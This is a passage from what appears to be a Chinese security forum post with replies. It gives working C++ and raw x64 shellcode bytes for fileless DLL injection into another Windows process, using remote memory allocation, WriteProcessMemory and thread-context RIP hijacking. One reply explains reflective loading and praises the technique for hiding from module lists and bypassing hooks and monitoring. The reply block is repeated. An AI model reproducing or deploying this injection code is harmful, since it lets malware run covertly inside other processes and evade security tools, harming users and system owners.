x44,0x24,0x20,0x48,0x6B,0xC0,0x28,0x48,0x89,0x44,0x24,0x78,0x8B,0x54,0x24,0x34,0x8B,0x4C,0x24,0x48,0xE8,0x47,0x00,0x00,0x00,0x48,0x8B,0x4C,0x24,0x70,0x48,0x8B,0x54,0x24,0x78,0x03,0x44,0x11,0x0C,0x89,0x44,0x24,0x38,0x8B,0x44,0x24,0x24,0x39,0x44,0x24,0x38,0x76,0x08,0x8B,0x44,0x24,0x38,0x89,0x44,0x24,0x24,0xE9,0x72,0xFF,0xFF,0xFF,0x8B,0x44,0x24,0x2C,0x39,0x44,0x24,0x24,0x76,0x08,0x8B,0x44,0x24,0x24,0x89,0x44,0x24,0x2C,0x8B,0x44,0x24,0x2C,0x48,0x81,0xC4,0x88,0x00,0x00,0x00,0xC3,0x89,0x54,0x24,0x10,0x89,0x4C,0x24,0x08,0x8B,0x44,0x24,0x08,0x8B,0x4C,0x24,0x10,0x8D,0x44,0x08,0xFF,0x8B,0x4C,0x24,0x10,0xFF,0xC9,0xF7,0xD1,0x23,0xC1,0xC3,0x44,0x89,0x44,0x24,0x18,0x48,0x89,0x54,0x24,0x10,0x48,0x89,0x4C,0x24,0x08,0x48,0x83,0xEC,0x58,0x48,0x8B,0x44,0x24,0x68,0x48,0x39,0x44,0x24,0x60,0x74,0x07,0x83,0x7C,0x24,0x70,0x00,0x75,0x05,0xE9,0xD8,0x01,0x00,0x00,0x48,0x8B,0x44,0x24,0x60,0x48,0x89,0x04,0x24,0x48,0x8B,0x44,0x24,0x68,0x48,0x89,0x44,0x24,0x08,0x48,0x8B,0x04,0x24,0x48,0x39,0x44,0x24,0x08,0x0F,0x83,0xFD,0x00,0x00,0x00,0x8B,0x44,0x24,0x70,0x48,0x8B,0x4C,0x24,0x08,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x3B,0x04,0x24,0x0F,0x86,0xE4,0x00,0x00,0x00,0x8B,0x44,0x24,0x70,0x48,0x8B,0x0C,0x24,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x04,0x24,0x8B,0x44,0x24,0x70,0x48,0x8B,0x4C,0x24,0x08,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x08,0x33,0xD2,0x8B,0x44,0x24,0x70,0xB9,0x04,0x00,0x00,0x00,0xF7,0xF1,0x8B,0xC0,0x48,0x89,0x44,0x24,0x10,0x33,0xD2,0x8B,0x44,0x24,0x70,0xB9,0x04,0x00,0x00,0x00,0xF7,0xF1,0x8B,0xC2,0x8B,0xC0,0x48,0x89,0x44,0x24,0x18,0x48,0x8B,0x44,0x24,0x10,0x48,0x89,0x44,0x24,0x30,0x48,0x8B,0x44,0x24,0x10,0x48,0xFF,0xC8,0x48,0x89,0x44,0x24,0x10,0x48,0x83,0x7C,0x24,0x30,0x00,0x74,0x29,0x48,0x8B,0x04,0x24,0x48,0x83,0xE8,0x04,0x48,0x89,0x04,0x24,0x48,0x8B,0x44,0x24,0x08,0x48,0x83,0xE8,0x04,0x48,0x89,0x44,0x24,0x08,0x48,0x8B,0x04,0x24,0x48,0x8B,0x4C,0x24,0x08,0x8B,0x09,0x89,0x08,0xEB,0xB8,0x48,0x8B,0x44,0x24,0x18,0x48,0x89,0x44,0x24,0x38,0x48,0x8B,0x44,0x24,0x18,0x48,0xFF,0xC8,0x48,0x89,0x44,0x24,0x18,0x48,0x83,0x7C,0x24,0x38,0x00,0x74,0x28,0x48,0x8B,0x04,0x24,0x48,0xFF,0xC8,0x48,0x89,0x04,0x24,0x48,0x8B,0x44,0x24,0x08,0x48,0xFF,0xC8,0x48,0x89,0x44,0x24,0x08,0x48,0x8B,0x04,0x24,0x48,0x8B,0x4C,0x24,0x08,0x0F,0xB6,0x09,0x88,0x08,0xEB,0xB9,0xE9,0xB9,0x00,0x00,0x00,0x33,0xD2,0x8B,0x44,0x24,0x70,0xB9,0x04,0x00,0x00,0x00,0xF7,0xF1,0x8B,0xC0,0x48,0x89,0x44,0x24,0x20,0x33,0xD2,0x8B,0x44,0x24,0x70,0xB9,0x04,0x00,0x00,0x00,0xF7,0xF1,0x8B,0xC2,0x8B,0xC0,0x48,0x89,0x44,0x24,0x28,0x48,0x8B,0x44,0x24,0x20,0x48,0x89,0x44,0x24,0x40,0x48,0x8B,0x44,0x24,0x20,0x48,0xFF,0xC8,0x48,0x89,0x44,0x24,0x20,0x48,0x83,0x7C,0x24,0x40,0x00,0x74,0x29,0x48,0x8B,0x04,0x24,0x48,0x8B,0x4C,0x24,0x08,0x8B,0x09,0x89,0x08,0x48,0x8B,0x04,0x24,0x48,0x83,0xC0,0x04,0x48,0x89,0x04,0x24,0x48,0x8B,0x44,0x24,0x08,0x48,0x83,0xC0,0x04,0x48,0x89,0x44,0x24,0x08,0xEB,0xB8,0x48,0x8B,0x44,0x24,0x28,0x48,0x89,0x44,0x24,0x48,0x48,0x8B,0x44,0x24,0x28,0x48,0xFF,0xC8,0x48,0x89,0x44,0x24,0x28,0x48,0x83,0x7C,0x24,0x48,0x00,0x74,0x28,0x48,0x8B,0x04,0x24,0x48,0x8B,0x4C,0x24,0x08,0x0F,0xB6,0x09,0x88,0x08,0x48,0x8B,0x04,0x24,0x48,0xFF,0xC0,0x48,0x89,0x04,0x24,0x48,0x8B,0x44,0x24,0x08,0x48,0xFF,0xC0,0x48,0x89,0x44,0x24,0x08,0xEB,0xB9,0x48,0x83,0xC4,0x58,0xC3 };

DWORD GetMainThreadId(DWORD pid) {

THREADENTRY32 te32;

HANDLE hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);

if (hThreadSnap == INVALID_HANDLE_VALUE) {

return 0;

}

te32.dwSize = sizeof(THREADENTRY32);

if (!Thread32First(hThreadSnap, &te32)) {

CloseHandle(hThreadSnap);

return 0;

}

do {

if (te32.th32OwnerProcessID == pid) {

CloseHandle(hThreadSnap);

return te32.th32ThreadID;

}

} while (Thread32Next(hThreadSnap, &te32));

CloseHandle(hThreadSnap);

return 0;

}

void work(DWORD pid,unsigned char* dlldata,DWORD len)

{

std::string data = "";

//打开这个进程并申请内存空间

HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

if (hProcess == NULL) {

// 处理错误

return;

}

// 申请内存空间

LONGLONG pRemoteBuf = (LONGLONG)VirtualAllocEx(hProcess, NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

if (pRemoteBuf == NULL) {

// 处理错误

CloseHandle(hProcess);

return;

}

//写入dll数据

SIZE_T bytesWritten;

if (!WriteProcessMemory(hProcess, (LPVOID)pRemoteBuf, dlldata, len, &bytesWritten) || bytesWritten != len) {

// 处理错误

VirtualFreeEx(hProcess, (LPVOID)pRemoteBuf, 0, MEM_RELEASE);

CloseHandle(hProcess);

return;

}

data.append((char*)ucpush, sizeof(ucpush));

//判断地址高位是不是0 mov rax,0x12345678

if ((pRemoteBuf >> 32) == 0) //说明高位为0

{

//data.append('0x48');

data += char(0x48);

data += char(0xc7);

data += char(0xc1);

data += (char)(pRemoteBuf & 0x000000ff);

data += (char)((pRemoteBuf & 0x0000ff00) >> 8);

data += (char)((pRemoteBuf & 0x00ff0000) >> 16);

data += (char)((pRemoteBuf & 0xff000000) >> 24);

}

else //说明高位不为0

{

data += char(0x48);

data += char(0xb9);

data += (char)(pRemoteBuf & 0x00000000000000ff);

data += (char)((pRemoteBuf & 0x000000000000ff00) >> 8);

data += (char)((pRemoteBuf & 0x0000000000ff0000) >> 16);

data += (char)((pRemoteBuf & 0x00000000ff000000) >> 24);

data += (char)((pRemoteBuf & 0x000000ff00000000) >> 32);

data += (char)((pRemoteBuf & 0x0000ff0000000000) >> 40);

data += (char)((pRemoteBuf & 0x00ff000000000000) >> 48);

data += (char)((pRemoteBuf & 0xff00000000000000) >> 56);

}

//下面是call

data += char(0xe8);

data += char(0x2d);

data += char(0x00);

data.append((char*)ucpop, sizeof(ucpop));

//获取进程线程信息

// 2. 获取目标进程主线程的线程ID

DWORD mainThreadId = GetMainThreadId(pid);

if (mainThreadId == 0) {

CloseHandle(hProcess);

return;

}

// 3. 获取目标线程的句柄

HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, mainThreadId);

if (hThread == NULL) {

CloseHandle(hProcess);

return;

}

// 4. 获取目标线程的上下文（Context）

CONTEXT threadContext;

threadContext.ContextFlags = CONTEXT_CONTROL; // 获取控制寄存器上下文

if (!GetThreadContext(hThread, &threadContext)) {

DWORD error = GetLastError();

CloseHandle(hThread);

CloseHandle(hProcess);

return;

}

// 5. 修改 EIP/RIP，设置新的执行地址

// 在 64 位系统上，修改 RIP 寄存器来指定新的执行位置

LONGLONG RIP = threadContext.Rip; // 保存当前的 RIP 值

//这个地方还需要加上push原地址和ret 使用sub rsp,8, mov [rsp],mov [rsp+4] ret

data += char(0x48);

data += char(0x83);

data += char(0xec);

data += char(0x08);

data += char(0xc7);

data += char(0x04);

data += char(0x24);

data += (char)(RIP & 0x000000ff);

data += (char)((RIP & 0x0000ff00) >> 8);

data += (char)((RIP & 0x00ff0000) >> 16);

data += (char)((RIP & 0xff000000) >> 24);

data += char(0xc7);

data += char(0x44);

data += char(0x24);

data += char(0x04);

data += (char)((RIP & 0x000000ff00000000) >> 32);

data += (char)((RIP & 0x0000ff0000000000) >> 40);

data += (char)((RIP & 0x00ff000000000000) >> 48);

data += (char)((RIP & 0xff00000000000000) >> 56);

data += char(0xc3);

data.append((char*)load, sizeof(load));

//申请内存

LONGLONG pRemoteBuf2 = (LONGLONG)VirtualAllocEx(hProcess, NULL, data.length(), MEM_COMMIT, PAGE_EXECUTE_READWRITE);

if (pRemoteBuf2 == NULL) {

// 处理错误

VirtualFreeEx(hProcess, (LPVOID)pRemoteBuf, 0, MEM_RELEASE);

CloseHandle(hThread);

CloseHandle(hProcess);

return;

}

//写入数据

if (!WriteProcessMemory(hProcess, (LPVOID)pRemoteBuf2, data.c_str(), data.length(), &bytesWritten) || bytesWritten != data.length()) {

// 处理错误

VirtualFreeEx(hProcess, (LPVOID)pRemoteBuf, 0, MEM_RELEASE);

VirtualFreeEx(hProcess, (LPVOID)pRemoteBuf2, 0, MEM_RELEASE);

CloseHandle(hThread);

CloseHandle(hProcess);

return;

}

threadContext.Rip = pRemoteBuf2; // 新的执行地址（假设目标地址为 0x12345678）

// 6. 设置修改后的上下文回到目标线程

if (!SetThreadContext(hThread, &threadContext)) {

// 处理错误

VirtualFreeEx(hProcess, (LPVOID)pRemoteBuf, 0, MEM_RELEASE);

VirtualFreeEx(hProcess, (LPVOID)pRemoteBuf2, 0, MEM_RELEASE);

CloseHandle(hThread);

CloseHandle(hProcess);

return;

}

// 这里是工作函数的实现

// 可以添加任何你需要的代码逻辑

}

简单注入通过 dll不落地

传播安全知识、拓宽行业人脉——看雪讲师团队等你加入！

#HOOK/注入

收藏・1

免费・0

支持

最新回复 (3)
祝你好运~ 雪币： 885 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 26 粉丝 1 关注私信	祝你好运~ 2 楼直接丢Ai就行了，记得几年前听说过这种把dll写内存的注入方式。 1. 核心注入方式手动映射（Manual Mapping）：直接将DLL的二进制数据（dlldata）写入目标进程的内存中（通过WriteProcessMemory），而不是通过LoadLibrary加载DLL文件。需要自行处理DLL的重定位、导入表、节区等PE结构，但代码中未显式处理这些（可能隐藏在load数组中）。反射式加载：代码中附加了一段shellcode（load数组），它很可能是一个反射加载器（Reflective Loader），用于在目标进程中解析并执行DLL（模拟PE加载器的工作）。反射加载器会处理DLL的初始化（如调用DllMain）。 3. 特点与优势无模块列表：DLL不会出现在PEB的模块列表中（隐藏性强），避免被常规检测发现。无文件落地：DLL数据直接写入内存，无需磁盘文件。绕过LoadLibrary：不调用LoadLibrary，避免触发一些钩子（Hooks）或监控。 2025-8-31 14:52 0
AL10000 雪币： 1272 活跃值： (1820) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 56 粉丝 0 关注私信	AL10000 3 楼感觉类似APC注入，同时，感觉稳定性不会很好，如果出现CPU中断情况堆栈数据可能容易被污染。 2025-8-31 15:28 0
TkBinary 雪币： 2839 活跃值： (12132) 能力值： (RANK：385 ) 在线值：发帖 25 回帖 482 粉丝 243 关注私信	TkBinary 5 4 楼内存注入.一楼说的对. 自己修复就可以了. 2025-9-1 11:00 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

许瑞

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (3)
祝你好运~ 雪币： 885 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 26 粉丝 1 关注私信	祝你好运~ 2 楼直接丢Ai就行了，记得几年前听说过这种把dll写内存的注入方式。 1. 核心注入方式手动映射（Manual Mapping）：直接将DLL的二进制数据（dlldata）写入目标进程的内存中（通过WriteProcessMemory），而不是通过LoadLibrary加载DLL文件。需要自行处理DLL的重定位、导入表、节区等PE结构，但代码中未显式处理这些（可能隐藏在load数组中）。反射式加载：代码中附加了一段shellcode（load数组），它很可能是一个反射加载器（Reflective Loader），用于在目标进程中解析并执行DLL（模拟PE加载器的工作）。反射加载器会处理DLL的初始化（如调用DllMain）。 3. 特点与优势无模块列表：DLL不会出现在PEB的模块列表中（隐藏性强），避免被常规检测发现。无文件落地：DLL数据直接写入内存，无需磁盘文件。绕过LoadLibrary：不调用LoadLibrary，避免触发一些钩子（Hooks）或监控。 2025-8-31 14:52 0
AL10000 雪币： 1272 活跃值： (1820) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 56 粉丝 0 关注私信	AL10000 3 楼感觉类似APC注入，同时，感觉稳定性不会很好，如果出现CPU中断情况堆栈数据可能容易被污染。 2025-8-31 15:28 0
TkBinary 雪币： 2839 活跃值： (12132) 能力值： (RANK：385 ) 在线值：发帖 25 回帖 482 粉丝 243 关注私信	TkBinary 5 4 楼内存注入.一楼说的对. 自己修复就可以了. 2025-9-1 11:00 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复